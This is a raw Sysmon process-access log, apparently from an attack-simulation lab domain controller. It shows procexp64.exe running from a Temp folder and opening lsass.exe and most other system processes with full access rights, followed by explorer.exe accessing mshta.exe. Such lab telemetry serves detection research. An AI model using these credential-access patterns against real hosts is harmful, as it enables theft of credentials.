15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.908{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.908{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 